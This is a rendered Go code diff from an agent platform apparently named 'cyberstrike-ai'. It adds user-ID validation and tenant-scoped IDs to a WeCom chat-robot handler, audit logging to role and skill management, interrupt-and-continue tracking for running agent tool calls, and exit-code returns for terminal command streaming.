h.logger.Warn("创建新对话失败", zap.Error(err)) h.logger.Warn("创建新对话失败", zap.Error(err))
return "" return ""
@@ -140,7 +199,16 @@ func (h *RobotHandler) clearConversation(platform, userID string) (newConvID str
// HandleMessage 处理用户输入,返回回复文本(供各平台 webhook 调用) // HandleMessage 处理用户输入,返回回复文本(供各平台 webhook 调用)
func (h *RobotHandler) HandleMessage(platform, userID, text string) (reply string) { func (h *RobotHandler) HandleMessage(platform, userID, text string) (reply string) {
platform = strings.TrimSpace(platform)
userID = strings.TrimSpace(userID)
text = strings.TrimSpace(text) text = strings.TrimSpace(text)
if platform == "" {
platform = "unknown"
}
if userID == "" {
h.logger.Warn("机器人消息缺少用户标识,已拒绝处理", zap.String("platform", platform))
return "无法识别发送者身份,请检查机器人事件订阅权限(需返回可用的用户 ID)。"
}
if text == "" { if text == "" {
return "请输入内容或发送「帮助」/ help 查看命令。" return "请输入内容或发送「帮助」/ help 查看命令。"
} }
@@ -174,7 +242,7 @@ func (h *RobotHandler) HandleMessage(platform, userID, text string) (reply strin
h.cancelMu.Unlock() h.cancelMu.Unlock()
}() }()
role := h.getRole(platform, userID) role := h.getRole(platform, userID)
resp, newConvID, err := h.agentHandler.ProcessMessageForRobot(ctx, convID, text, role) resp, newConvID, err := h.agentHandler.ProcessMessageForRobot(ctx, platform, convID, text, role)
if err != nil { if err != nil {
h.logger.Warn("机器人 Agent 执行失败", zap.String("platform", platform), zap.String("userID", userID), zap.Error(err)) h.logger.Warn("机器人 Agent 执行失败", zap.String("platform", platform), zap.String("userID", userID), zap.Error(err))
if errors.Is(err, context.Canceled) { if errors.Is(err, context.Canceled) {
@@ -345,7 +413,9 @@ func (h *RobotHandler) cmdDelete(platform, userID, convID string) string {
// 删除当前对话时,先清空会话绑定 // 删除当前对话时,先清空会话绑定
h.mu.Lock() h.mu.Lock()
delete(h.sessions, sk) delete(h.sessions, sk)
delete(h.sessionRoles, sk)
h.mu.Unlock() h.mu.Unlock()
h.deleteSessionBinding(sk)
} }
if err := h.db.DeleteConversation(convID); err != nil { if err := h.db.DeleteConversation(convID); err != nil {
return "删除失败: " + err.Error() return "删除失败: " + err.Error()
@@ -647,8 +717,25 @@ func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
h.logger.Debug("企业微信内层 XML 解析成功", zap.String("FromUserName", body.FromUserName), zap.String("Content", body.Content)) h.logger.Debug("企业微信内层 XML 解析成功", zap.String("FromUserName", body.FromUserName), zap.String("Content", body.Content))
} }
userID := body.FromUserName tenantKey := strings.TrimSpace(enterpriseID)
if tenantKey == "" {
tenantKey = strings.TrimSpace(h.config.Robots.Wecom.CorpID)
}
if tenantKey == "" {
tenantKey = "default"
}
rawUserID := strings.TrimSpace(body.FromUserName)
replyUserID := rawUserID
userID := ""
if rawUserID != "" {
userID = "t:" + tenantKey + "|u:" + rawUserID
}
text := strings.TrimSpace(body.Content) text := strings.TrimSpace(body.Content)
if userID == "" {
h.logger.Warn("企业微信消息缺少可用用户标识,已忽略")
c.String(http.StatusOK, "success")
return
}
// 限制回复内容长度(企业微信限制 2048 字节) // 限制回复内容长度(企业微信限制 2048 字节)
maxReplyLen := 2000 maxReplyLen := 2000
@@ -661,14 +748,14 @@ func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
if body.MsgType != "text" { if body.MsgType != "text" {
h.logger.Debug("企业微信收到非文本消息", zap.String("MsgType", body.MsgType)) h.logger.Debug("企业微信收到非文本消息", zap.String("MsgType", body.MsgType))
h.sendWecomReply(c, userID, enterpriseID, limitReply("暂仅支持文本消息,请发送文字。"), timestamp, nonce) h.sendWecomReply(c, replyUserID, enterpriseID, limitReply("暂仅支持文本消息,请发送文字。"), timestamp, nonce)
return return
} }
// 文本消息:先判断是否为内置命令(如 帮助/列表/新对话 等),这类命令处理很快,可以直接走被动回复,避免依赖主动发送 API。 // 文本消息:先判断是否为内置命令(如 帮助/列表/新对话 等),这类命令处理很快,可以直接走被动回复,避免依赖主动发送 API。
if cmdReply, ok := h.handleRobotCommand("wecom", userID, text); ok { if cmdReply, ok := h.handleRobotCommand("wecom", userID, text); ok {
h.logger.Debug("企业微信收到命令消息,走被动回复", zap.String("userID", userID), zap.String("text", text)) h.logger.Debug("企业微信收到命令消息,走被动回复", zap.String("userID", userID), zap.String("text", text))
h.sendWecomReply(c, userID, enterpriseID, limitReply(cmdReply), timestamp, nonce) h.sendWecomReply(c, replyUserID, enterpriseID, limitReply(cmdReply), timestamp, nonce)
return return
} }
@@ -684,7 +771,7 @@ func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
reply = limitReply(reply) reply = limitReply(reply)
h.logger.Debug("企业微信消息处理完成", zap.String("userID", userID), zap.String("reply", reply)) h.logger.Debug("企业微信消息处理完成", zap.String("userID", userID), zap.String("reply", reply))
// 调用企业微信 API 主动发送消息 // 调用企业微信 API 主动发送消息
h.sendWecomMessageViaAPI(userID, enterpriseID, reply) h.sendWecomMessageViaAPI(rawUserID, enterpriseID, reply)
}() }()
} }
+16
View File
@@ -8,6 +8,7 @@ import (
"regexp" "regexp"
"strings" "strings"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"gopkg.in/yaml.v3" "gopkg.in/yaml.v3"
@@ -21,6 +22,12 @@ type RoleHandler struct {
config *config.Config config *config.Config
configPath string configPath string
logger *zap.Logger logger *zap.Logger
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *RoleHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewRoleHandler 创建新的角色处理器 // NewRoleHandler 创建新的角色处理器
@@ -174,6 +181,9 @@ func (h *RoleHandler) UpdateRole(c *gin.Context) {
} }
h.logger.Info("更新角色", zap.String("oldKey", roleName), zap.String("newKey", finalKey), zap.String("name", req.Name)) h.logger.Info("更新角色", zap.String("oldKey", roleName), zap.String("newKey", finalKey), zap.String("name", req.Name))
if h.audit != nil {
h.audit.RecordOK(c, "role", "update", "更新角色", "role", finalKey, map[string]interface{}{"name": req.Name})
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": "角色已更新", "message": "角色已更新",
"role": req, "role": req,
@@ -219,6 +229,9 @@ func (h *RoleHandler) CreateRole(c *gin.Context) {
} }
h.logger.Info("创建角色", zap.String("roleName", req.Name)) h.logger.Info("创建角色", zap.String("roleName", req.Name))
if h.audit != nil {
h.audit.RecordOK(c, "role", "create", "创建角色", "role", req.Name, nil)
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": "角色已创建", "message": "角色已创建",
"role": req, "role": req,
@@ -287,6 +300,9 @@ func (h *RoleHandler) DeleteRole(c *gin.Context) {
} }
h.logger.Info("删除角色", zap.String("roleName", roleName)) h.logger.Info("删除角色", zap.String("roleName", roleName))
if h.audit != nil {
h.audit.RecordOK(c, "role", "delete", "删除角色", "role", roleName, nil)
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": "角色已删除", "message": "角色已删除",
}) })
+31 -13
View File
@@ -8,6 +8,7 @@ import (
"regexp" "regexp"
"strings" "strings"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/skillpackage" "cyberstrike-ai/internal/skillpackage"
@@ -23,6 +24,12 @@ type SkillsHandler struct {
configPath string configPath string
logger *zap.Logger logger *zap.Logger
db *database.DB // 数据库连接(遗留统计;MCP list/read 已移除) db *database.DB // 数据库连接(遗留统计;MCP list/read 已移除)
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *SkillsHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewSkillsHandler 创建新的Skills处理器 // NewSkillsHandler 创建新的Skills处理器
@@ -65,19 +72,19 @@ func (h *SkillsHandler) GetSkills(c *gin.Context) {
allSkillsInfo := make([]map[string]interface{}, 0, len(allSummaries)) allSkillsInfo := make([]map[string]interface{}, 0, len(allSummaries))
for _, s := range allSummaries { for _, s := range allSummaries {
skillInfo := map[string]interface{}{ skillInfo := map[string]interface{}{
"id": s.ID, "id": s.ID,
"name": s.Name, "name": s.Name,
"dir_name": s.DirName, "dir_name": s.DirName,
"description": s.Description, "description": s.Description,
"version": s.Version, "version": s.Version,
"path": s.Path, "path": s.Path,
"tags": s.Tags, "tags": s.Tags,
"triggers": s.Triggers, "triggers": s.Triggers,
"script_count": s.ScriptCount, "script_count": s.ScriptCount,
"file_count": s.FileCount, "file_count": s.FileCount,
"progressive": s.Progressive, "progressive": s.Progressive,
"file_size": s.FileSize, "file_size": s.FileSize,
"mod_time": s.ModTime, "mod_time": s.ModTime,
} }
allSkillsInfo = append(allSkillsInfo, skillInfo) allSkillsInfo = append(allSkillsInfo, skillInfo)
} }
@@ -365,6 +372,9 @@ func (h *SkillsHandler) CreateSkill(c *gin.Context) {
} }
h.logger.Info("创建skill成功", zap.String("skill", req.Name)) h.logger.Info("创建skill成功", zap.String("skill", req.Name))
if h.audit != nil {
h.audit.RecordOK(c, "skill", "create", "创建 Skill", "skill", req.Name, nil)
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": "skill已创建", "message": "skill已创建",
"skill": map[string]interface{}{ "skill": map[string]interface{}{
@@ -425,6 +435,9 @@ func (h *SkillsHandler) UpdateSkill(c *gin.Context) {
} }
h.logger.Info("更新skill成功", zap.String("skill", skillName)) h.logger.Info("更新skill成功", zap.String("skill", skillName))
if h.audit != nil {
h.audit.RecordOK(c, "skill", "update", "更新 Skill", "skill", skillName, nil)
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": "skill已更新", "message": "skill已更新",
}) })
@@ -459,6 +472,11 @@ func (h *SkillsHandler) DeleteSkill(c *gin.Context) {
} }
h.logger.Info("删除skill成功", zap.String("skill", skillName)) h.logger.Info("删除skill成功", zap.String("skill", skillName))
if h.audit != nil {
h.audit.RecordOK(c, "skill", "delete", "删除 Skill", "skill", skillName, map[string]interface{}{
"affected_roles": affectedRoles,
})
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": responseMsg, "message": responseMsg,
"affected_roles": affectedRoles, "affected_roles": affectedRoles,
+114 -2
View File
@@ -3,8 +3,11 @@ package handler
import ( import (
"context" "context"
"errors" "errors"
"strings"
"sync" "sync"
"time" "time"
"cyberstrike-ai/internal/multiagent"
) )
// ErrTaskCancelled 用户取消任务的错误 // ErrTaskCancelled 用户取消任务的错误
@@ -13,6 +16,13 @@ var ErrTaskCancelled = errors.New("agent task cancelled by user")
// ErrTaskAlreadyRunning 会话已有任务正在执行 // ErrTaskAlreadyRunning 会话已有任务正在执行
var ErrTaskAlreadyRunning = errors.New("agent task already running for conversation") var ErrTaskAlreadyRunning = errors.New("agent task already running for conversation")
// shouldPersistEinoAgentTraceAfterRunErrorEino 相关 Run 非成功返回时,是否仍写入 last_react_* 供下轮 loadHistoryFromAgentTrace。
// 当前策略:无论正常结束、异常结束或用户主动停止,都尽量保留最后可用轨迹,
// 以便在同一会话继续时可基于原始上下文续跑,而不是回退到仅消息文本历史。
func shouldPersistEinoAgentTraceAfterRunError(baseCtx context.Context) bool {
return true
}
// AgentTask 描述正在运行的Agent任务 // AgentTask 描述正在运行的Agent任务
type AgentTask struct { type AgentTask struct {
ConversationID string `json:"conversationId"` ConversationID string `json:"conversationId"`
@@ -21,9 +31,103 @@ type AgentTask struct {
Status string `json:"status"` Status string `json:"status"`
CancellingAt time.Time `json:"-"` // 进入 cancelling 状态的时间,用于清理长时间卡住的任务 CancellingAt time.Time `json:"-"` // 进入 cancelling 状态的时间,用于清理长时间卡住的任务
// ActiveMCPExecutionID 当前正在执行的 MCP 工具 executionId(仅内存,供「中断并继续」= 仅掐当前工具)
ActiveMCPExecutionID string `json:"-"`
// InterruptContinueNote 无 MCP 时「中断并继续」由用户在弹窗中填写的补充说明(Cancel 前写入,续跑轮次读取后清空)
InterruptContinueNote string `json:"-"`
cancel func(error) cancel func(error)
} }
// RegisterRunningTool 实现 mcp.ToolRunRegistry:工具开始时登记本会话当前 executionId。
func (m *AgentTaskManager) RegisterRunningTool(conversationID, executionID string) {
conversationID = strings.TrimSpace(conversationID)
executionID = strings.TrimSpace(executionID)
if conversationID == "" || executionID == "" {
return
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
t.ActiveMCPExecutionID = executionID
}
}
// UnregisterRunningTool 工具结束时清除登记(仅当 id 仍匹配时清除,避免并发串单)。
func (m *AgentTaskManager) UnregisterRunningTool(conversationID, executionID string) {
conversationID = strings.TrimSpace(conversationID)
executionID = strings.TrimSpace(executionID)
if conversationID == "" || executionID == "" {
return
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
if t.ActiveMCPExecutionID == executionID {
t.ActiveMCPExecutionID = ""
}
}
}
// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。
func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
t.InterruptContinueNote = note
}
}
// TakeInterruptContinueNote 读取并清空补充说明(续跑开始时调用一次)。
func (m *AgentTaskManager) TakeInterruptContinueNote(conversationID string) string {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return ""
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
n := t.InterruptContinueNote
t.InterruptContinueNote = ""
return n
}
return ""
}
// BindTaskCancel 在同一运行任务内替换与 context 绑定的 cancel 函数(用于中断后继续时换新 baseCtx)。
func (m *AgentTaskManager) BindTaskCancel(conversationID string, cancel context.CancelCauseFunc) {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" || cancel == nil {
return
}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
t.cancel = func(err error) {
cancel(err)
}
}
}
// ActiveMCPExecutionID 返回当前会话进行中的工具 executionId,无则空串。
func (m *AgentTaskManager) ActiveMCPExecutionID(conversationID string) string {
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return ""
}
m.mu.RLock()
defer m.mu.RUnlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
return strings.TrimSpace(t.ActiveMCPExecutionID)
}
return ""
}
// CompletedTask 已完成的任务(用于历史记录) // CompletedTask 已完成的任务(用于历史记录)
type CompletedTask struct { type CompletedTask struct {
ConversationID string `json:"conversationId"` ConversationID string `json:"conversationId"`
@@ -155,8 +259,16 @@ func (m *AgentTaskManager) CancelTask(conversationID string, cause error) (bool,
return true, nil return true, nil
} }
task.Status = "cancelling" // ErrInterruptContinue:仅掐断当前推理步骤,随后由处理器续跑,不进入长时间「取消中」态。
task.CancellingAt = time.Now() if cause != nil && errors.Is(cause, multiagent.ErrInterruptContinue) {
task.Status = "running"
} else {
task.Status = "cancelling"
task.CancellingAt = time.Now()
}
if cause != nil && errors.Is(cause, ErrTaskCancelled) {
task.InterruptContinueNote = ""
}
cancel := task.cancel cancel := task.cancel
m.mu.Unlock() m.mu.Unlock()
+1 -1
View File
@@ -253,5 +253,5 @@ func (h *TerminalHandler) RunCommandStream(c *gin.Context) {
flusher.Flush() flusher.Flush()
} }
runCommandStreamImpl(cmd, sendEvent, ctx) _ = runCommandStreamImpl(cmd, sendEvent, ctx)
} }
+3 -2
View File
@@ -15,11 +15,11 @@ const ptyCols = 256
const ptyRows = 40 const ptyRows = 40
// runCommandStreamImpl 在 Unix 下用 PTY 执行,使 ping 等命令按终端宽度排版(isatty 为真) // runCommandStreamImpl 在 Unix 下用 PTY 执行,使 ping 等命令按终端宽度排版(isatty 为真)
func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) { func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) int {
ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: ptyCols, Rows: ptyRows}) ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: ptyCols, Rows: ptyRows})
if err != nil { if err != nil {
sendEvent(streamEvent{T: "exit", C: -1}) sendEvent(streamEvent{T: "exit", C: -1})
return return -1
} }
defer ptmx.Close() defer ptmx.Close()
@@ -43,4 +43,5 @@ func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx contex
exitCode = -1 exitCode = -1
} }
sendEvent(streamEvent{T: "exit", C: exitCode}) sendEvent(streamEvent{T: "exit", C: exitCode})
return exitCode
} }
+5 -4
View File
@@ -11,20 +11,20 @@ import (
) )
// runCommandStreamImpl 在 Windows 下用 stdout/stderr 管道执行 // runCommandStreamImpl 在 Windows 下用 stdout/stderr 管道执行
func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) { func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) int {
stdoutPipe, err := cmd.StdoutPipe() stdoutPipe, err := cmd.StdoutPipe()
if err != nil { if err != nil {
sendEvent(streamEvent{T: "exit", C: -1}) sendEvent(streamEvent{T: "exit", C: -1})
return return -1
} }
stderrPipe, err := cmd.StderrPipe() stderrPipe, err := cmd.StderrPipe()
if err != nil { if err != nil {
sendEvent(streamEvent{T: "exit", C: -1}) sendEvent(streamEvent{T: "exit", C: -1})
return return -1
} }
if err := cmd.Start(); err != nil { if err := cmd.Start(); err != nil {
sendEvent(streamEvent{T: "exit", C: -1}) sendEvent(streamEvent{T: "exit", C: -1})
return return -1
} }
normalize := func(s string) string { normalize := func(s string) string {
@@ -62,4 +62,5 @@ func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx contex
exitCode = -1 exitCode = -1
} }
sendEvent(streamEvent{T: "exit", C: exitCode}) sendEvent(streamEvent{T: "exit", C: exitCode})
return exitCode
} }

Some files were not shown because too many files have changed in this diff Show More